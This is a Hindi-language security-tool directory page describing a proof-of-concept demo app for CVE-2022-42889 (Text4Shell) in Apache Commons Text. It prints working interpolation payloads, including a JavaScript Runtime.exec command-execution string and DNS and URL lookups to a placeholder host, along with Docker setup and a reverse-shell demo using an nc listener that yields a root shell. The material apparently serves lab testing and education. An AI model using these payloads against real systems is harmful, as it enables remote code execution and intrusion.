Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2022-42889-POC — एक सरल एप्लिकेशन जो दिखाता है कि CVE-2022-42889 कमजोरी का शोषण कैसे किया जाए | Kitploit
उपकरण/GitHubGitHub/korteke/cve-2022-42889-poc
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षापेलोड डेवलपमेंट
GitHubkorteke/cve-2022-42889-poc

CVE-2022-42889-POC

एक सरल एप्लिकेशन जो दिखाता है कि CVE-2022-42889 कमजोरी का शोषण कैसे किया जाए

रिपॉजिटरी देखें
11713 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2022-42889-POC

CVE-2022-42889 भेद्यता का शोषण करने का तरीका दिखाने वाला एक सरल डेमो एप्लिकेशन।
DNS और URL उपसर्गों को प्रदर्शित करने के लिए OOB (आउट ऑफ बैंड) सेवाओं का उपयोग करता है।

commons-text इंटरपोलेशन के लिए JavaDocs commons-text JavaDocs

उदाहरण इंटरपोलेशन

  • script:javascript ("${script:javascript:java.lang.Runtime.getRuntime().exec('touch /tmp/blop')}")
  • dns ("${dns:address|HOST}")
  • url ("${url:UTF-8:http://HOST")

Rapid7 का उद्धरण

इस भेद्यता की तुलना Log4Shell से की गई है क्योंकि यह एक ओपन-सोर्स लाइब्रेरी-स्तरीय भेद्यता है जिसके प्रासंगिक ऑब्जेक्ट का उपयोग करने वाले विभिन्न प्रकार के सॉफ़्टवेयर अनुप्रयोगों को प्रभावित करने की संभावना है।
हालाँकि, प्रारंभिक विश्लेषण से पता चलता है कि यह एक गलत तुलना है। भेद्यता की प्रकृति का अर्थ है कि Log4Shell के विपरीत, यह दुर्लभ होगा कि कोई एप्लिकेशन Commons Text के असुरक्षित घटक का उपयोग अविश्वसनीय, संभावित रूप से दुर्भावनापूर्ण इनपुट को संसाधित करने के लिए करता है।

पूर्वापेक्षाएँ

  • docker
  • java
  • maven

यदि कोई Docker Hub से इमेज लाता है तो Java और maven को छोड़ा जा सकता है।

उपयोग

एप्लिकेशन बनाएँ

root@kitploit:~
mvn clean package

Docker इमेज बनाएँ

root@kitploit:~
docker build -t cve-2022-42889-poc .

Docker इमेज चलाएँ

root@kitploit:~
docker run --rm -p 8081:8081 -t cve-2022-42889-poc

एप्लिकेशन तक पहुँचें और निर्देशों का पालन करें

root@kitploit:~
open http://localhost:8081

जाँचें कि भेद्यता /tmp/ निर्देशिका में एक नई फ़ाइल (/tmp/blop) बनाती है

root@kitploit:~
➜  ~ docker exec -ti cve-2022-42889-poc /bin/ls /tmp

blop		 tomcat-docbase.8081.12439436974042217796
hsperfdata_root  tomcat.8081.2549096106233509364
➜  ~

रिवर्स शेल। अपनी स्थानीय मशीन पर "nc" लॉन्च करें

root@kitploit:~
➜  ~ nc -lv 4242
root@7cfcd6a39a61:/# whoami && uname -a
whoami && uname -a
root
Linux 7cfcd6a39a61 5.10.76-linuxkit #1 SMP Mon Nov 8 10:21:19 UTC 2021 x86_64 GNU/Linux
root@7cfcd6a39a61:/#

UI

नेटवर्क इंटरैक्शन प्रमाण। स्थानीय interactsh-client से परीक्षण किया गया।

अधिक जानकारी

  • NIST NVD
  • Rapid 7
टूल डाउनलोड करें